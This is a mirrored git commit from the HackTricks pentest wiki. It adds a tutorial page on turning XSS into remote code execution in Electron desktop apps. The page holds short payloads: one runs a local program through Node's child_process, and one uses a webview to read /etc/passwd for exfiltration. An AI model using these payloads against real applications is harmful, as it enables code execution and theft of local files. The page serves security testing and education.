mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-24 21:53:54 +00:00
GitBook: [master] one page and 2 assets modified
This commit is contained in:
parent
2c0fbb6425
commit
a140aa95ee
3 changed files with 45 additions and 1 deletions
BIN
.gitbook/assets/1-u1jdryuwaevwjmf_f2ttjg.png
Normal file
BIN
.gitbook/assets/1-u1jdryuwaevwjmf_f2ttjg.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 62 KiB |
BIN
.gitbook/assets/image (434).png
Normal file
BIN
.gitbook/assets/image (434).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 68 KiB |
|
@ -1,4 +1,48 @@
|
|||
# XSS to RCE Electron Desktop Apps
|
||||
|
||||
Recommended read: [https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1](https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1)
|
||||
Recommended read for more trick: [https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1](https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1)
|
||||
|
||||
When I test Electron app, first I always check the options of the [BrowserWindow API](https://www.electronjs.org/docs/api/browser-window), which is used to create a browser window. By checking it, I think about how RCE can be achieved when arbitrary JavaScript execution on the renderer is possible.
|
||||
Example:
|
||||
|
||||
```text
|
||||
const mainWindowOptions = {
|
||||
title: 'Discord',
|
||||
backgroundColor: getBackgroundColor(),
|
||||
width: DEFAULT_WIDTH,
|
||||
height: DEFAULT_HEIGHT,
|
||||
minWidth: MIN_WIDTH,
|
||||
minHeight: MIN_HEIGHT,
|
||||
transparent: false,
|
||||
frame: false,
|
||||
resizable: true,
|
||||
show: isVisible,
|
||||
webPreferences: {
|
||||
blinkFeatures: 'EnumerateDevices,AudioOutputDevices',
|
||||
nodeIntegration: false,
|
||||
preload: _path2.default.join(__dirname, 'mainScreenPreload.js'),
|
||||
nativeWindowOpen: true,
|
||||
enableRemoteModule: false,
|
||||
spellcheck: true
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
## nodeIntgration RCE
|
||||
|
||||
If the nodeIntegration is set to true, a web page's JavaScript can use Node.js features easily just by calling the `require()`. For example, the way to execute the calc application on Windows is:
|
||||
|
||||
```text
|
||||
<script>
|
||||
require('child_process').exec('calc');
|
||||
</script>
|
||||
```
|
||||
|
||||
## Read Arbitrary Internal FIle
|
||||
|
||||
If contextIsolation set to false you can try to use <webview> \(similar to <iframe> butcan load local files\) to read local files and exfiltrate them: using something like **<webview src=”file:///etc/passwd”></webview>:**
|
||||
|
||||
![](../../.gitbook/assets/1-u1jdryuwaevwjmf_f2ttjg.png)
|
||||
|
||||
**\(Trick copied form** [**here**](https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d)**\).**
|
||||
|
||||
|
|
Loading…
Reference in a new issue